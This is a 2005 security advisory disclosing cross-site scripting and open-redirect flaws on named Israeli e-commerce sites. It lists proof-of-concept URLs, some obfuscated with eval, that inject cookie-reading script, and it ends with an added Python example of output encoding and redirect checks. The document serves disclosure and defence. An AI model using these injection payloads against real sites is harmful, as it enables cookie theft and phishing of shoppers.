From: avivra at 012.net.il (Aviv Raff)
Subject: Leading Israeli e-commerce sites XSS vulnerabilities advisory


Leading Israeli e-commerce sites XSS vulnerabilities advisory


URL: http://www.raffon.net/advisories/commxss.html
Date: January 10, 2005
Author: Aviv Raff 


Introduction

Many leading Israeli e-commerce sites are phishing enabled, and contain
pages which allow injecting code that can execute arbitrary scripts.



Technical Details

Many leading Israeli e-commerce sites generate dynamic HTML web pages using
user-submitted data, and data from other sources. Most of these sites do not
filter the data before presenting it to the user, and therefore are
vulnerable to Cross-Site Scripting. They allow injecting code that can
execute arbitrary scripts, steal the user's cookie, or display fake pages.
The P1000 web site allows redirecting to external pages through a simple
query string input, which phishers can easily exploit.



Examples

NetAction: 
http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>

P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com

Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>alert(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseover=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"

Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</script>

GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.cookie)</script>

Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=<script>alert(document.cookie)</script>

NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>

Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail='><script>alert(document.cookie)</script>

Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.cookie)</script>&type=1&rtype=1

Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml

Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)</script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_dot.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>

Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="http://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.cookie)"></iframe>

Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(document.cookie)</script>

One (This is actually a leading sport website, but it has a paid premium
section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data=<script>alert(document.cookie)</script>
http://www.one.co.il/search/MoreArticals.asp?data=<script>alert(document.cookie)</script>



Solutions

All of the sites were contacted via email or a suggestion form on
27/12/2004.
The Netaction, P1000, GetIt, Daka90, Arkia and Printmall sites have already
fixed the vulnerabilities.
The Wallashops, Issta and Parsi sites are partly fixed.
The other sites are still vulnerable, and one should be careful when
following a link to those sites or giving them confidential information.



Disclaimer: The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.


-- Copyright © 2004-2005 Aviv Raff. --
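
The following is an added example, not part of the original advisory and not code from any of the listed sites. It shows in Python the two server-side checks that the Technical Details section calls for: encoding a reflected query-string value before it is written into the page, and restricting a redirect parameter to local paths or allow-listed hosts. The function names and the `shop.example` allow-list are assumptions, and the sample inputs are constructed from the patterns listed under Examples.

```python
import html
from urllib.parse import urlsplit

# Hypothetical allow-list; a real site would list its own hosts here.
ALLOWED_REDIRECT_HOSTS = {"shop.example"}


def render_search_form(keyword: str) -> str:
    """Reflect a query-string value in an HTML body and a quoted attribute.

    html.escape(quote=True) encodes & < > " and ', so the value can neither
    close the attribute nor open a tag. The attribute must stay quoted; this
    encoding is not sufficient for unquoted attributes, URLs or script blocks.
    """
    safe = html.escape(keyword, quote=True)
    return (f"<p>Results for: {safe}</p>\n"
            f'<input type="text" name="keyword" value="{safe}">')


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Return target only if it is a local path or an allow-listed host."""
    # Browsers read "\" as "/" and drop control characters, so reject both.
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return default
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed authority, e.g. an unclosed "["
        return default
    if not parts.scheme and not parts.netloc:
        # Local path only: a second leading "/" would name another host.
        local = target.startswith("/") and not target.startswith("//")
        return target if local else default
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return target
    return default


if __name__ == "__main__":
    # Constructed inputs that follow the patterns in the Examples section.
    for value in ('"><script>alert(document.cookie)</script>',
                  '" onmouseover=alert(document.cookie) x="'):
        print(render_search_form(value), end="\n\n")
    for url in ("http://www.phisher.com", "//www.phisher.com", "/cart"):
        print(f"{url!r} -> {safe_redirect_target(url)!r}")
```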
